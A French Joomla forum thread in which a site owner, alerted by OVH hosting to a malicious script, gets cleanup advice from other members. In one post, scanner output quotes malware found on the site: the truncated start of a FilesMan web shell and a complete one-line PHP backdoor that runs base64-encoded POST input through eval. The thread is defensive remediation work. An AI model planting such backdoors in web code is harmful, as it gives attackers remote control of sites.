Un script malveillant a été détecté sur votre hébergement

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Un script malveillant a été détecté sur votre hébergement

    Bonjour à tous,

    petit nouveau dans la communauté de Joomla,
    je suis confronté à ce problème de script malveillant.
    J'ai fait toutes les mises à jours requises sur le site malheureusement le problème revient...
    J'ai cherché sur Google mais je n'ai malheureusement pas trouver de réponses.
    Je me tourne donc vers la communauté.
    Merci d'avance pour votre aide.
    Cordialement
    Christophe

    Ci dessous le mail d'OVH:

    De : Support OVH Voir la version brute du message
    SAS OVH - www.ovh.com
    2 rue Kellermann
    BP 80157
    59100 Roubaix


    X-Ovh-Section: mutu

    Bonjour,

    Notre système de surveillance a détecté une opération irrégulière au niveau de votre site. Ce message a pour but de vous alerter sur le fait que votre site et vos données peuvent encourir un risque.
    Par mesure de sécurité, nous venons de bloquer l'accès à votre site, cependant, l'accès à votre espace d'hébergement (FTP) reste tout de même accessible.

    Vous trouverez ci-dessous les détails techniques de cette opération :

    Domaine : ********.com
    Problème rencontré : Un script malveillant a été détecté sur votre hébergement
    Commande apparente : ././crond
    Exécutable utilisé : /homez.60/******/www/libraries/cms/table/.nfs000000000790260700006e7d
    Horodatage: 2016-05-10 18:25:10

    Il est possible qu'un script malveillant présent sur votre hébergement soit à l'origine de cette exécution. Si vous n'êtes pas à l'origine de l'exécution de ce script, cela signifie qu'il y a une faille sur votre site et qu'un hacker s'en est servi pour réaliser cette opération.

    Plusieurs éléments doivent obligatoirement être réalisés pour corriger cette situation. Vous pourrez vous aider de ce guide pour réaliser les différentes manipulations : g1392.procedure-fermeture-hack-ovh

  • #2
    Re : Un script malveillant a été détecté sur votre hébergement

    Salut,

    As tu regardé le fichier indiqué par ovh ?
    Exécutable utilisé : /homez.60/******/www/libraries/cms/table/.nfs000000000790260700006e7d
    Utilise-tu des extensions joomla pour protéger ton site ? Ou d'autres systèmes comme Aesecure ?

    Un nettoyage s'impose, dans un premier temps fait un backup de ton site sur ton Pc.
    Ensuite regarde dans les dossiers un à un et vois si il y à pas des fichiers qui n'auraient rien à faire ici.

    Ensuite tu peux vérifier qu'il ne reste pas des dossiers d'extensions ou plugins que tu n'utilise plus, que tu aurais
    désinstallé sans supprimer les fichiers.

    Une extensions désinstallée sur joomla mais dont les fichiers n'ont pas étés supprimés peuvent représenté une "menace". Si il y à une faille dedans qui aurait été corrigée par la suite mais pas chez toi car pas de mise à jour cela pourrait être ton problème.

    Ensuite si tu les as notés ou que tu as bonne mémoire tu pourrais nous dire quel templates et quel extensions tu utilise.

    Edit: D'autres plus expérimentés que moi te guiderons mieux mais je pense que c'est un bon début.

    Commentaire


    • #3
      Re : Un script malveillant a été détecté sur votre hébergement

      Bonjour

      Les fichiers .nfs sont des fichiers temporaires; je n'ai pas très bien compris comment ces fichiers sont générés chez OVH mais chaque fois qu'ils envoient un mail de ce type, ils font référence à un fichier .nfs qui est supprimé rapidement après ==> ce fichier n'a aucune importance en fait.

      Mais oui, si ton site est hacké (et le fait de recevoir un tel mail de l'hébergeur en est une preuve) il va te falloir faire du nettoyage.

      Si tu as un backup récent et sain de ton site; c'est toujours la meilleure solution : restaure le site et protège-le ensuite.

      Bonne journée.
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire


      • #4
        Re : Un script malveillant a été détecté sur votre hébergement

        Bonjour,
        Merci pour vos réponses.
        je suis entrain de copier le site sur mon PC.
        Je reprends le site depuis hier seulement, il a un catalogue d'un millier de produits.
        Evidemment aucunes backups saines... et en effet le fichier indésirable est supprimé à l'envoie du mail d'ovh...
        Je vais déjà faire une purge des fichiers et faire un scan avec aeSecure QuickScan et je reviens vers vous.
        Je vous mettrais aussi les extensions utilisés sur ce fameux site.
        Cordialement
        Christophe

        Commentaire


        • #5
          Re : Un script malveillant a été détecté sur votre hébergement

          Ovh fait des backups automatisés de tes fichiers peut être auront-ils une sauvegarde saine regarde ici si sa peut t'aider.

          Commentaire


          • #6
            Re : Un script malveillant a été détecté sur votre hébergement

            Rebonjour,
            Pour les backups d'OVH c'est cuit, les 1er mails d'OVH datent du 19 avril 2016.
            J'ai trouver un dossier NewSite sur le FTP qui est en fait une vieille version du site.
            Je pense qu'il y a fort à parier que la faille provienne de ce vieux dossier.
            Qu'en pensez vous ?

            Commentaire


            • #7
              Re : Un script malveillant a été détecté sur votre hébergement

              Bonjour,
              c'est sur que laisser du vieux code sur un hebergement, c'est pas top ... mais aucune certitude que ça vienne de là.
              Il va te faloir Nettoyer de fond en comble !!!
              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

              Commentaire


              • #8
                Re : Un script malveillant a été détecté sur votre hébergement

                Résultat du scan "aeSecure QuickScan" des 500 premiers fichiers:

                /home/***/www/modules/mod_system/mod_system.php(22.70K)(Date dernière modif. March 07 2015 09:08:56.)
                b554748dfa88baa7d0a0f7f502104286Attention Il ne s'agit pas forcément d'un virus!; la signature recherchée est également utilisée dans du code légitime.
                Signature : FilesMan
                Trouvé en position 100 du fichier; voici le contexte :
                <?php
                $auth_pass = "310dcbbf4cce62f762a2aaa148d556bd"; #root
                $color = "#df5";
                $default_action = "FilesMan";
                $default_charset = "Windows-1251";
                preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x

                ×
                /home/***/www/images/saved.php(106.00B)(Date dernière modif. May 31 2014 17:20:16.)
                35c9d56dbb5ceb23fafe1f386be71534Danger Forte probabilité qu'il s'agisse d'un fichier ayant été virusé ou étant un virus
                Signature : eval(base64_decode($_POST
                Trouvé en position 60 du fichier; voici le contexte :
                <?php if($_POST["key"]=="7e67b92288a16fb0c0c76412e8047595"){eval(base64_ decode($_POST["code"]));die();} ?>
                Attention Il ne s'agit pas forcément d'un virus!; la signature recherchée est également utilisée dans du code légitime.
                Signature : base64_decode
                Trouvé en position 65 du fichier; voici le contexte :
                <?php if($_POST["key"]=="7e67b92288a16fb0c0c76412e8047595"){eval(base64_ decode($_POST["code"]));die();} ?>

                Qu'en pensez vous ?

                Merci d'avance.

                Commentaire


                • #9
                  Re : Un script malveillant a été détecté sur votre hébergement

                  rebonjour

                  Confirmation que tu as des bestioles... Les codes que tu postes sont, sans aucun doute possible, des virus.

                  Allez, on se remonte les manches et zou', on fait le ménage.
                  Christophe (cavo789)
                  Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                  Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                  Commentaire


                  • #10
                    Re : Un script malveillant a été détecté sur votre hébergement

                    Bonjour à tous,

                    bon j'ai mis les mains dans le cambouis et j'ai trouvé de tout...

                    Même une page d'un site de rencontre dans un dossier appellé "web"

                    je vais bien voir si OVH me signale de nouveau une anomalie, je vous tiendrais au courant le cas échéant.

                    Merci à tous pour vos précieux conseils et à Christophe pour aeSecure QuickScan un outil magique !

                    J'attends de finir le nettoyage pour sécuriser le site avec votre extension.

                    Commentaire


                    • #11
                      Re : Un script malveillant a été détecté sur votre hébergement

                      Merci pour ton appréciation Tigers. Comprends bien aussi les limitations de QuickScan (Quick = superficiel); il faut un outil plus puissant pour détecter tous les virus (si tel est le besoin)
                      Christophe (cavo789)
                      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                      Commentaire


                      • #12
                        Re : Un script malveillant a été détecté sur votre hébergement

                        Bonjour,

                        AESEcure est très bien.

                        En scan tu as également http://www.centrora.com/ que j'ai testé et utilise désormais de partout également. Cher. Mais très bien en scan de fichiers infectés.

                        Je te conseille de faire une bonne sauvegarde de ton site désormais; au cas où cela revienne...

                        Bonne continuation

                        Commentaire


                        • #13
                          Re : Un script malveillant a été détecté sur votre hébergement

                          Bonjour à tous,
                          j'ai fignolé le nettoyage hier,
                          le site est en ligne depuis 15H hier,
                          ça à l'air de tenir bon côté OVH...
                          Merci à tous pour vos précieux conseils et votre aide...
                          J'attends un peu et je passerais le sujet en résolu si tel est bien le cas...
                          Bonne journée à tous

                          Commentaire

                          Annonce

                          Réduire
                          Aucune annonce pour le moment.

                          Partenaire de l'association

                          Réduire

                          Hébergeur Web PlanetHoster
                          Travaille ...
                          X